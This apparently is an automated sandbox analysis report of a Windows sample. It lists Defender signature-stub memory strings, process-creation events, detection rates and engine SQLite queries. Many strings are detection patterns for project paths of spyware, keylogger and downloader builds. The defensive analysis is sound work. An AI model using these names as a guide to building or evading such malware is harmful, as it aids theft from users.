Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 2-.+:\\Users\\alx\\Desktop\\xxxx\\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp Binary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: Pinball.vbp
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp Binary or memory string: \GetIPAddresListFromHost\ForRobot\IPv6Chat.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: @.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: /*.+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp Binary or memory string: dTP*\AD:\Master\ADWARA_NEW\idle_componet.vbpd
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+\\Motivo\\Moti.*\\Venta\\.+\\MotivosMo.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\SqUeEzEr\Desktop\OPENSC CODES FROM ME\Downloader\.vbp
Source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp Binary or memory string: .vbpa)
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\aw1\\Etmscztha.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 0MicroProCon\MicroCon.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+\\Progetos\\Msn Spybox\\.+.vbp
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: &!.+\\Progetos\\Msn Spybox\\.+.vbp
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: >9C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: lgC:\\(DOCUME~1|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win|wix|WS86).+?\.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \AYO.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+\\Poll\\oPoll\\.+\\PolloPoll.vbp
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp Binary or memory string: C:\Archivos de programa\Microsoft Visual Studio\VB98\Proyecto1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: z1.vbp]
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 1,.+:\\OsamaB\\inLa\\den.+\\.*\\OsamaBinL.vbp
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: RF:\vb\VISUAL BASIC\VARIOS\teuer\Teuer.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\Users\\alx\\Desktop\\xxxx\\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .vbp
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp Binary or memory string: z1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: E:\\kaynak( Kod|~1)\\spynma(il_Merged|~1).+?\.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 4\MicroProCon\SeconFile.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 2-.+\\Motivo\\Moti.*\\Venta\\.+\\MotivosMo.vbp
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp Binary or memory string: ,:\revolucao\SysBox.vbpax
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: @*\AD:\Master\ADWARA_NEW\codec\Codec.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: Z*\AE:\Stuff\Lilith Premium\Start\Projekt1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: C:\\GotaGo\\.*\\otaGotaGo.vbp
Source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp Binary or memory string: \Asterios\Heriposter.vbpxe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: C:\\(DOCUME~1|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win|wix|WS86).+?\.vbp
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: cMicroLab.vbp
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp Binary or memory string: \ADWARA\prjX.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: nAndr huttaP.vbpxY
Source: MpSigStub.exe, 0000000B.00000003.18320594233.0000021B5E399000.00000004.00000001.sdmp Binary or memory string: .VBProjects
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp Binary or memory string: *\AD:\Lap Trinh\Virus Mau\Pro 3\Pro3.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\.*\\MicroApp.*\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 72E:\\kaynak( Kod|~1)\\spynma(il_Merged|~1).+?\.vbp
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp Binary or memory string: nh AV\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: AD:\Cambiador.vbp
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: >9.+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: Jwarka\kul\201-solitaire\Solitaire.vbp
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: HKnamemom.vbpa
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: *\AC:\Documents and Settings\tjasi\Desktop\Downloader\Stub\p.vbpd"URLDownloadToFile
Source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp Binary or memory string: \Simplesso.vbp
Source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp Binary or memory string: -powerword\PowerWord.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\OsamaB\\inLa\\den.+\\.*\\OsamaBinL.vbp
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\.*\\StuB\\Pro.vbp
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp Binary or memory string: \RenoNevada\MainMango\Server.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \Bonus 1.5.vbp
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.sln.|%WINDIR%\Explorer.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 61.+:\\.*\\MicroApp.*\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp Binary or memory string: @\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: .+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp Binary or memory string: 8Business\Kitty Logger\KL.vbp]
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: C:\NuAT.vbp]
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 8\MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: (#.+\\Poll\\oPoll\\.+\\PolloPoll.vbp
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbpxN
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp Binary or memory string: .+Yakoza\\server\\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbp
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 1ocuments and Settings\Usuario\1scritorio\Ex\Ex.vbp]
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp Binary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: \Pack.vbp
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: "D:\SK51\Keys.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
Source: 1gPmnCR2PX.exe Virustotal: Detection: 22%
Source: 1gPmnCR2PX.exe ReversingLabs: Detection: 17%
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\1gPmnCR2PX.exe 'C:\Users\user\Desktop\1gPmnCR2PX.exe'
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-796ed98e.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.237.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-796ed98e.exe /q WD
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\4EDE279A-C0F0-19A6-1502-6263C94C7DB4.man
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\4EDE279A-C0F0-19A6-1502-6263C94C7DB4.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-728dfe11.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-728dfe11.exe
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process created: C:\Users\user\Desktop\1gPmnCR2PX.exe 'C:\Users\user\Desktop\1gPmnCR2PX.exe'
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process created: C:\Users\user\Desktop\1gPmnCR2PX.exe 'C:\Users\user\Desktop\1gPmnCR2PX.exe' Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.237.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-796ed98e.exe /q WD Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-728dfe11.exe Jump to behavior
Source: C:\Windows\System32\wevtutil.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32 Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AF118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle, 18_2_00007FF7E30AF118
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\Local\Temp\~DF293283A36A66FD97.TMP Jump to behavior
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyInfo(Key, UnbiasedTime) VALUES (?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(13, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT DISTINCT TableName FROM AnomalyTables;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; DELETE FROM RollingQueuesTables WHERE (Name NOT IN (SELECT DISTINCT EntryTable FROM RollingQueuesValues)); SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?; SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?; INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesValues WHERE ExpireTime < ?; DELETE FROM RollingQueuesTables; DELETE FROM RollingQueuesValues; SELECT COUNT(1) FROM RollingQueuesValues; Failed to fetch row from prepared statement.Failed to get column from prepared statement.Failed to bind value to prepared statement.
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileHashes WHERE FileHashes.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM RansomwareDetections;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM NetworkIpFirewallRules;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime, UpdateTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);DELETE FROM AutoFeatureControl;DELETE FROM AutoFeatureControl WHERE InstanceTimeStamp < ?; SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Key, CurrCount, MaxCount, InstanceTimeStamp FROM AutoFeatureControl WHERE Key = ?DELETE FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileLowFiAsync;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;SELECT Count(1) FROM BackupProcessInfo;SELECT ID FROM BackupProcessInfo WHERE Key = ?;INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);DELETE FROM BackupProcessInfo WHERE Key = ?;DELETE FROM BackupProcessInfo WHERE InstanceTimeStamp < ?; ^;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID from RecordIdentifier WHERE Key = ? AND RecordTimeStamp = ? ;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(6, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(14, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;N
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
